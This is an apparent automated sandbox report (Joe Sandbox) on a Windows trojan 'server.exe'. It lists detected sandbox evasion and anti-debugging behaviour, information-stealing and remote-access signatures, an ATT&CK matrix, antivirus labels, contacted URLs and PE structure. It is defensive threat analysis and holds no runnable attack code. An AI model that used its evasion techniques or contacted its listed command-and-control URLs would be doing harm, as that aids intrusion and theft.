      Source: C:\Users\user\Desktop\server.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_022230D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_022230D5
      Source: C:\Users\user\Desktop\server.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@1/0
      Source: C:\Users\user\Desktop\server.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\server.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\server.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

      Data Obfuscation

      Source: C:\Users\user\Desktop\server.exe | Unpacked PE file: 0.2.server.exe.400000.0.unpack .text:ER;.data:W;.pozipiw:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
      Source: C:\Users\user\Desktop\server.exe | Unpacked PE file: 0.2.server.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02227F30 push ecx; ret 0_2_02227F39
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_0222831B push ecx; ret 0_2_0222832B
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00723408 push ds; ret 0_2_00723409
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_0071D95D push 8B8751D0h; retf 0_2_0071D962
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00722D2A push ebp; ret 0_2_00722D2F
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00723783 push ds; ret 0_2_00723791
      Source: server.exe | Static PE information: section name: .pozipiw
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000

      Hooking and other Techniques for Hiding and Protection

      Source: Yara match | File source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTR
      Source: C:\Users\user\Desktop\server.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\server.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
Source: C:\Users\user\Desktop\server.exe | Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\server.exe TID: 1212 | Thread sleep count: 40 > 30
Source: C:\Users\user\Desktop\server.exe TID: 1212 | Thread sleep count: 32 > 30
Source: C:\Users\user\Desktop\server.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\server.exe | API call chain: ExitProcess graph end node
Source: server.exe, 00000000.00000002.517572455.0000000000729000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

      Anti Debugging

      barindex
Source: C:\Users\user\Desktop\server.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_0050092B mov eax, dword ptr fs:[00000030h] 0_2_0050092B
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00500D90 mov eax, dword ptr fs:[00000030h] 0_2_00500D90
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_0071AE32 push dword ptr fs:[00000030h] 0_2_0071AE32
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000
Source: C:\Users\user\Desktop\server.exe | Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
Source: C:\Users\user\Desktop\server.exe | Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,0_2_00501C58
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02223BD3 cpuid 0_2_02223BD3
Source: C:\Users\user\Desktop\server.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_00401D68
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_004015B0
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02223BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_02223BD3

      Stealing of Sensitive Information

      barindex
Source: Yara match | File source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTR

      Remote Access Functionality

      barindex
Source: Yara match | File source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTR
MITRE ATT&CK matrix (numbers in parentheses are the count of matched signatures for that technique; "-" marks an empty cell):

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation (2) | Path Interception | Path Interception | Virtualization/Sandbox Evasion (11) | Input Capture (1) | System Time Discovery (1) | Remote Services | Input Capture (1) | Exfiltration Over Other Network Medium | Encrypted Channel (2) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact (1)
Default Accounts | Native API (12) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Obfuscated Files or Information (1) | LSASS Memory | Security Software Discovery (11) | Remote Desktop Protocol | Archive Collected Data (11) | Exfiltration Over Bluetooth | Non-Application Layer Protocol (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing (21) | Security Account Manager | Virtualization/Sandbox Evasion (11) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | Process Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Remote System Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery (124) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
Source | Detection | Scanner | Label
server.exe | 36% | ReversingLabs | Win32.Ransomware.LockbitCrypt
server.exe | 42% | Virustotal |
server.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
0.2.server.exe.2220000.2.unpack | 100% | Avira | HEUR/AGEN.1245293
0.2.server.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
checklist.skype.com | unknown | unknown | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://checklist.skype.com/drew/8GsEYWG5R7vgd6ovGci/nrUBbPIi4nn3B9s17IICy8/dABAhwF5Li84O/L9tQ_2Fw/xJ | server.exe, 00000000.00000002.517572455.0000000000768000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checklist.skype.com/drew/8GsEYWG5R7vgd6ovGci/nrUBbPIi4nn3B9s17IICy8/dABAhwF5Li84O/L9tQ_2Fw/ | server.exe, 00000000.00000002.517572455.0000000000773000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checklist.skype.com/ | server.exe, 00000000.00000002.517572455.0000000000768000.00000004.00000020.00020000.00000000.sdmp | false | | high
No contacted IP infos
              Joe Sandbox Version:37.0.0 Beryl
              Analysis ID:830549
              Start date and time:2023-03-20 13:46:26 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 9s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:13
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:server.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@1/0@1/0
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 47.7% (good quality ratio 46.4%)
              • Quality average: 82.1%
              • Quality standard deviation: 26.5%
              HCA Information:
              • Successful, ratio: 97%
              • Number of executed functions: 44
              • Number of non-executed functions: 36
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
• Not all processes were analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              No simulations
No context
              No created / dropped files found
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.799872795596262
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:server.exe
              File size:181760
              MD5:2ca14653601a8e9adb830e183c5874d7
              SHA1:0e75f94eb23c8aac9b3301951d2df8639304a165
              SHA256:a9934cc506821e82237fdaf471f845e1e027b37841d635f971b8df6853e9d7f9
              SHA512:6bc10edfc7f586cca680eebff64ce6e4a126961422027c1c8b115d879a893ab16727872aba8c5574ebd11a5a31bad757e72d5d4a42c842cf527879d87b42a0a3
              SSDEEP:3072:QSR/F1oN0510sk/iH6xxkhdbV5Vk6T23Ls/CYi:9vom0KH6sN/VkJLs/C
              TLSH:F5049EC393907C65E4168A3E8E2EC2F4770DFC91CE5DAB56E2186B2F08BC1B2D562751
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.Q.f.Q.f.Q...Q.f.Q..4Q.f.Q...Q.f.Q..9Q.f.Q.f.Q.f.Q...Q.f.Q..0Q.f.Q..7Q.f.QRich.f.Q........PE..L.....Pa...................
              Icon Hash:9aa2521289929292
              Entrypoint:0x402f31
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
              Time Stamp:0x61501880 [Sun Sep 26 06:51:44 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:2bf4bd16bd9a3948cc472dde1e8c8ccd
              Instruction
              call 00007F85B4470EE0h
              jmp 00007F85B446E50Eh
              mov eax, 0040D008h
              ret
              mov eax, dword ptr [0049D700h]
              push esi
              push 00000014h
              pop esi
              test eax, eax
              jne 00007F85B446E689h
              mov eax, 00000200h
              jmp 00007F85B446E688h
              cmp eax, esi
              jnl 00007F85B446E689h
              mov eax, esi
              mov dword ptr [0049D700h], eax
              push 00000004h
              push eax
              call 00007F85B4470F8Eh
              pop ecx
              pop ecx
              mov dword ptr [0049C6E0h], eax
              test eax, eax
              jne 00007F85B446E6A0h
              push 00000004h
              push esi
              mov dword ptr [0049D700h], esi
              call 00007F85B4470F75h
              pop ecx
              pop ecx
              mov dword ptr [0049C6E0h], eax
              test eax, eax
              jne 00007F85B446E687h
              push 0000001Ah
              pop eax
              pop esi
              ret
              xor edx, edx
              mov ecx, 0040D008h
              jmp 00007F85B446E687h
              mov eax, dword ptr [0049C6E0h]
              mov dword ptr [edx+eax], ecx
              add ecx, 20h
              add edx, 04h
              cmp ecx, 0040D288h
              jl 00007F85B446E66Ch
              push FFFFFFFEh
              pop esi
              xor edx, edx
              mov ecx, 0040D018h
              push edi
              mov eax, edx
              sar eax, 05h
              mov eax, dword ptr [0049C5E0h+eax*4]
              mov edi, edx
              and edi, 1Fh
              shl edi, 06h
              mov eax, dword ptr [edi+eax]
              cmp eax, FFFFFFFFh
              je 00007F85B446E68Ah
              cmp eax, esi
              je 00007F85B446E686h
              test eax, eax
              jne 00007F85B446E684h
              mov dword ptr [ecx], esi
              add ecx, 20h
              inc edx
              cmp ecx, 0040D078h
              jl 00007F85B446E650h
              pop edi
              xor eax, eax
              pop esi
              ret
              call 00007F85B446EC96h
              cmp byte ptr [00000000h], 00000000h
              Programming Language:
              • [C++] VS2010 build 30319
              • [ASM] VS2010 build 30319
              • [ C ] VS2010 build 30319
              • [IMP] VS2008 SP1 build 30729
              • [RES] VS2010 build 30319
              • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb84c | 0x3c | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9f000 | 0xdaf0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2b08 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x19c | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb1ae | 0xb200 | False | 0.5147691362359551 | data | 6.028090938354116 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0xd000 | 0x9070c | 0x13200 | False | 0.9456188725490197 | data | 7.850203467316377 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pozipiw | 0x9e000 | 0x96 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x9f000 | 0xdaf0 | 0xdc00 | False | 0.4134765625 | data | 4.476679864737693 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
AFX_DIALOG_LAYOUT | 0xab598 | 0x2 | data | |
TONIZITOHOWAPEVUMOBEM | 0xaaea0 | 0x598 | ASCII text, with very long lines (1432), with no line terminators | Sami Lappish | Finland
TONIZITOHOWAPEVUMOBEM | 0xaaea0 | 0x598 | ASCII text, with very long lines (1432), with no line terminators | Sami Lappish | Norway
TONIZITOHOWAPEVUMOBEM | 0xaaea0 | 0x598 | ASCII text, with very long lines (1432), with no line terminators | Sami Lappish | Sweden
RT_CURSOR | 0xab5a0 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | |
RT_CURSOR | 0xab6d0 | 0xf0 | Device independent bitmap graphic, 24 x 48 x 1, image size 0 | |
RT_CURSOR | 0xab7c0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | |
RT_ICON | 0x9f680 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Finland
RT_ICON | 0x9f680 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Norway
RT_ICON | 0x9f680 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Sweden
RT_ICON | 0x9ff28 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland
RT_ICON | 0x9ff28 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway
RT_ICON | 0x9ff28 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xa0ff8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Finland
RT_ICON | 0xa0ff8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Norway
RT_ICON | 0xa0ff8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xa18a0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Finland
RT_ICON | 0xa18a0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Norway
RT_ICON | 0xa18a0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xa3e48 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland
RT_ICON | 0xa3e48 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway
RT_ICON | 0xa3e48 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xa4f20 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Sami Lappish | Finland
RT_ICON | 0xa4f20 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Sami Lappish | Norway
RT_ICON | 0xa4f20 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xa5dc8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Sami Lappish | Finland
RT_ICON | 0xa5dc8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Sami Lappish | Norway
RT_ICON | 0xa5dc8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xa6490 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Sami Lappish | Finland
RT_ICON | 0xa6490 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Sami Lappish | Norway
RT_ICON | 0xa6490 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xa69f8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Finland
RT_ICON | 0xa69f8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Norway
RT_ICON | 0xa69f8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xa8fa0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland
RT_ICON | 0xa8fa0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway
RT_ICON | 0xa8fa0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xaa048 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Sami Lappish | Finland
RT_ICON | 0xaa048 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Sami Lappish | Norway
RT_ICON | 0xaa048 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xaa9d0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Sami Lappish | Finland
RT_ICON | 0xaa9d0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Sami Lappish | Norway
RT_ICON | 0xaa9d0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Sami Lappish | Sweden
RT_ACCELERATOR | 0xab4e0 | 0x78 | data | Sami Lappish | Finland
RT_ACCELERATOR | 0xab4e0 | 0x78 | data | Sami Lappish | Norway
RT_ACCELERATOR | 0xab4e0 | 0x78 | data | Sami Lappish | Sweden
RT_ACCELERATOR | 0xab438 | 0xa8 | data | Sami Lappish | Finland
RT_ACCELERATOR | 0xab438 | 0xa8 | data | Sami Lappish | Norway
RT_ACCELERATOR | 0xab438 | 0xa8 | data | Sami Lappish | Sweden
RT_GROUP_CURSOR | 0xac868 | 0x30 | data | |
RT_GROUP_ICON | 0xa4ef0 | 0x30 | data | Sami Lappish | Finland
RT_GROUP_ICON | 0xa4ef0 | 0x30 | data | Sami Lappish | Norway
RT_GROUP_ICON | 0xa4ef0 | 0x30 | data | Sami Lappish | Sweden
RT_GROUP_ICON | 0xa0fd0 | 0x22 | data | Sami Lappish | Finland
RT_GROUP_ICON | 0xa0fd0 | 0x22 | data | Sami Lappish | Norway
RT_GROUP_ICON | 0xa0fd0 | 0x22 | data | Sami Lappish | Sweden
RT_GROUP_ICON | 0xaae38 | 0x68 | data | Sami Lappish | Finland
RT_GROUP_ICON | 0xaae38 | 0x68 | data | Sami Lappish | Norway
RT_GROUP_ICON | 0xaae38 | 0x68 | data | Sami Lappish | Sweden
RT_VERSION | 0xac898 | 0x258 | data | |
None | 0xab558 | 0xa | data | Sami Lappish | Finland
None | 0xab558 | 0xa | data | Sami Lappish | Norway
None | 0xab558 | 0xa | data | Sami Lappish | Sweden
None | 0xab568 | 0xa | data | Sami Lappish | Finland
None | 0xab568 | 0xa | data | Sami Lappish | Norway
None | 0xab568 | 0xa | data | Sami Lappish | Sweden
None | 0xab578 | 0xa | data | Sami Lappish | Finland
None | 0xab578 | 0xa | data | Sami Lappish | Norway
None | 0xab578 | 0xa | data | Sami Lappish | Sweden
None | 0xab588 | 0xa | data | Sami Lappish | Finland
None | 0xab588 | 0xa | data | Sami Lappish | Norway
None | 0xab588 | 0xa | data | Sami Lappish | Sweden
DLL | Import
KERNEL32.dll | PulseEvent, SetDefaultCommConfigA, FindFirstFileW, EnumCalendarInfoA, CopyFileExW, GetConsoleAliasExesA, _llseek, BuildCommDCBAndTimeoutsA, GetConsoleAliasA, GetCurrentProcess, InterlockedCompareExchange, GetWindowsDirectoryA, EnumTimeFormatsA, WriteFileGather, EnumResourceTypesA, ActivateActCtx, GetFirmwareEnvironmentVariableA, LoadLibraryW, Sleep, ReadConsoleInputA, LeaveCriticalSection, GetFileAttributesW, WritePrivateProfileSectionW, TerminateProcess, IsDBCSLeadByte, lstrcmpW, GlobalUnlock, RaiseException, SetCurrentDirectoryA, SetLastError, GetProcAddress, GlobalGetAtomNameA, OpenWaitableTimerA, LocalAlloc, FindFirstVolumeMountPointW, AddAtomA, FindNextFileA, GetModuleHandleA, GetCPInfoExA, SetCalendarInfoA, DeleteFileW, EnumCalendarInfoExA, LocalFree, GetLastError, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, EnterCriticalSection, SetFilePointer, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, GetModuleHandleW, ExitProcess, WriteFile, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapFree, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapAlloc, HeapReAlloc, WriteConsoleW, MultiByteToWideChar, IsProcessorFeaturePresent, LCMapStringW, GetStringTypeW, HeapSize, CloseHandle, 